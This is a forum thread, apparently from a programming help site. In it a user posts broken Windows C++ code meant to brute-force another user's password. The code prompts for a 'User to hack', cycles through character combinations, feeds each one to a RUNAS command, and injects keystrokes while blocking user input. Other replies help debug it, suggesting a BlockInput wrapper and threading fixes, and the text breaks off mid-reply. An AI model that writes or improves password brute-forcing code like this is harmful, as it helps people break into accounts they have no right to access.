Hey I had this pretend password spammer program (which just outputted a cycle of many combinations) but after randomly browsing MSDN for a while I wondered if I could make it work for real...
I don't think an awful lot of this is right but it compiles, only to get a runtime error.

    #include <Windows.h>
    #include <stdio.h>
    #include <string.h>
    #include <string>
    #define NAME_SIZE 20
    #define PASS_SIZE 20
    using namespace std;
    void CALLBACK sendMessage(string arg);
    int main(){
        char user[NAME_SIZE];
        printf("User to hack: ");
        for(int i=0; i<NAME_SIZE; i++){
            char temp = getchar();
            if(isalnum(temp))
                user[i] = temp;
            else break;
        }
        string word;
        word.push_back(' '); //To add first field to vector before while loop
        short asSet = 32;
        short asGet;
        short pos; //used to index position of word[]
        printf("Trying Combination:\n");
        while(word.size() < PASS_SIZE){
            pos = 0;
            while(asSet < 127){ //To cycle through 1st number
                word[0] = (asSet); //Set word[0] to asSet ASCII
                LPTHREAD_START_ROUTINE address = (LPTHREAD_START_ROUTINE)sendMessage;
                if(CreateThread(NULL, NULL, address, &word, NULL, NULL)){
                    //Compiler was complaining about how I was putting string together so I gave up and changed it to this
                    string full = "RUNAS //user:";
                    full += user;
                    full += " found.exe "; //Application doesn't exist yet but will take the password as launch argument
                    full += word;
                    if(system(full.c_str()))
                        exit(0);
                    printf("%s", (word.c_str()));
                    printf("\r");
                    asSet++; //increment ASCII code for word[0]
                }
            }//CLOSE while(temp < 127)
            while(asSet != 32){
                asGet = (word[pos]); //gets ASCII code for word[pos]
                if(asGet == 126){ //if ASCII for word[pos] is maxed
                    word[pos] = ' '; //reset this to SP (ASCII=32)
                    if(pos == (word.size() -1)) //if this is last character (i.e last combination)
                        word.push_back('!'); //add another character for new combinations
                    else //if this is NOT last character
                        pos++; //move to next character for testing
                }//CLOSE if(asGet == 126)
                else{ //if ASCII for word[pos] is NOT maxed
                    word[pos] = (asGet +1); //increment its current ASCII value
                    asSet = 32; //reset iterator for word[0] to exit loop and re-enter top loop
                }//CLOSE else
            }//CLOSE while(asSet != 32)
        }//CLOSE while(word.size() < PASS_SIZE)
    }
    void CALLBACK sendMessage(string arg){
        BlockInput(TRUE);
        INPUT msg[PASS_SIZE];
        for(int i=0; i<PASS_SIZE; i++){
            msg[i].type = INPUT_KEYBOARD;
            KEYBDINPUT key;
            key.wVk = arg[i];
            key.wScan = NULL;
            key.dwFlags = NULL;
            key.time = NULL;
            key.dwExtraInfo = NULL;
            msg[i].ki = key;
        }
        SendInput(PASS_SIZE, msg, sizeof(INPUT));
        BlockInput(FALSE);
    }

The runtime error I get is in a big message box from either Windows or the IDE saying "Expression: Subscript out of range", however the box only appears for a split second before it and the application terminate (I quickly used print screen and paint to view the message).
So... How badly does this program kill my computer and how insane am I for trying it?
I may also want to mention that a lot of this doesn't even make sense to myself, I made half the code years ago when I first started programming so it's a bit messed up, secondly I'm not all in the right mind right now as it's 1:45am XD
Wait... I've had a nice long kip and I think I see the error is because I'm sending ascii character values as key values.
I.e. it starts with '!' which as a key value should be '1' with the shift bit (or whatever it is that needs to be active)
So once I've corrected that do you think it'll work?
Also, the BlockInput is kinda risky, you should do a little protection against crashes (even tho Windows should handle it well):

    // Outside of any function:
    struct SafeBlockInput {
        SafeBlockInput() { BlockInput(TRUE); }
        ~SafeBlockInput() { BlockInput(FALSE); }
    };
    // Remove all your BlockInput calls from the sendMessage function and:
    void CALLBACK sendMessage(string arg){
        SafeBlockInput sbi;
        // ...
    }

This way, whichever way the function quits, even in case of exceptions, SafeBlockInput::~SafeBlockInput will be called, and it will call BlockInput(FALSE); which will unblock input for the user.
Well I think I've changed that since I last posted but I can't be sure without checking, cheers for pointing that out, and yes Windows does handle the errors, although I'd say a little badly but nonetheless.
Just another thing:
You may get some errors, due to CreateThread and asynchronies with your main program flow.
Also you should create an LPTHREAD_START_ROUTINE function without casting it!
To solve this error (At least in this example):